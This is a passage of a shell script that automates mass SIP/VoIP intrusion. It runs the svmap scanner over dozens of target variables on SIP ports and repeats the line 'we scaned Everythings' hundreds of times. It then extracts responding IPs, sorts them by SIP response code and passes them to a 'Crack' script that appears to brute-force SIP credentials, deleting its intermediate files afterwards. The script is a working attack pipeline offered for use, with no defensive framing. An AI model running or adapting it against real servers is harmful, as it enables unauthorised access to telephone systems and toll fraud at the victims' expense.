python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR215 -m INVITE -v >> result.txt

         echo ----------------- $VAR216----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR216 -m INVITE -v >> result.txt

         echo ----------------- $VAR217----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR217 -m INVITE -v >> result.txt

         echo ----------------- $VAR218----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR218 -m INVITE -v >> result.txt

         echo ----------------- $VAR219----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR219 -m INVITE -v >> result.txt

         echo ----------------- $VAR220----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR220 -m INVITE -v >> result.txt

         echo ----------------- $VAR221----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR221 -m INVITE -v >> result.txt

         echo ----------------- $VAR222----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR222 -m INVITE -v >> result.txt

         echo ----------------- $VAR223----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR223 -m INVITE -v >> result.txt

         echo ----------------- $VAR224----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR224 -m INVITE -v >> result.txt

         echo ----------------- $VAR225----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR225 -m INVITE -v >> result.txt

         echo ----------------- $VAR226----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR226 -m INVITE -v >> result.txt

         echo ----------------- $VAR227----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR227 -m INVITE -v >> result.txt

         echo ----------------- $VAR228----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR228 -m INVITE -v >> result.txt

         echo ----------------- $VAR229----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR229 -m INVITE -v >> result.txt

         echo ----------------- $VAR230----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR230 -m INVITE -v >> result.txt

         echo ----------------- $VAR231----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR231 -m INVITE -v >> result.txt

         echo ----------------- $VAR232----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR232 -m INVITE -v >> result.txt

         echo ----------------- $VAR233----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR233 -m INVITE -v >> result.txt

         echo ----------------- $VAR234----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR234 -m INVITE -v >> result.txt

         echo ----------------- $VAR235----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR235 -m INVITE -v >> result.txt

         echo ----------------- $VAR236----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR236 -m INVITE -v >> result.txt

         echo ----------------- $VAR237----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR237 -m INVITE -v >> result.txt

         echo ----------------- $VAR238----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR238 -m INVITE -v >> result.txt

         echo ----------------- $VAR239----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR239 -m INVITE -v >> result.txt

         echo ----------------- $VAR240----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR240 -m INVITE -v >> result.txt

         echo ----------------- $VAR241----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR241 -m INVITE -v >> result.txt

         echo ----------------- $VAR242----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR242 -m INVITE -v >> result.txt

         echo ----------------- $VAR243----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR243 -m INVITE -v >> result.txt

         echo ----------------- $VAR244----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR244 -m INVITE -v >> result.txt

         echo ----------------- $VAR245----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR245 -m INVITE -v >> result.txt

         echo ----------------- $VAR246----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR246 -m INVITE -v >> result.txt

         echo ----------------- $VAR247----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR247 -m INVITE -v >> result.txt

         echo ----------------- $VAR248----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR248 -m INVITE -v >> result.txt

         echo ----------------- $VAR249----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR249 -m INVITE -v >> result.txt

         echo ----------------- $VAR250----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR250 -m INVITE -v >> result.txt

         echo ----------------- $VAR251----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR251 -m INVITE -v >> result.txt

         echo ----------------- $VAR252----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR252 -m INVITE -v >> result.txt

         echo ----------------- $VAR253----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR253 -m INVITE -v >> result.txt

         echo ----------------- $VAR254----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR254 -m INVITE -v >> result.txt

         echo ----------------- $VAR255----------------
python svmap.py -p5060-5099,14310,6060,6061 -t0.0 $VAR255 -m INVITE -v >> result.txt



echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
echo "we scaned Everythings"
sleep 50

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

grep -Po "(\d+\.){3}\d+:?(\d?){6}" result.txt >>IPS
perl run IPS
cat 401.pal 400.pal 403.pal 404.pal >> ipSIP
rm IPS # remove the file IPS
rm result.txt # remove the file
sleep 5

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 250 2 ipSIP
rm ipSIP # remove the file ipSIP
rm *.pal # remove the file

sleep 50

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"
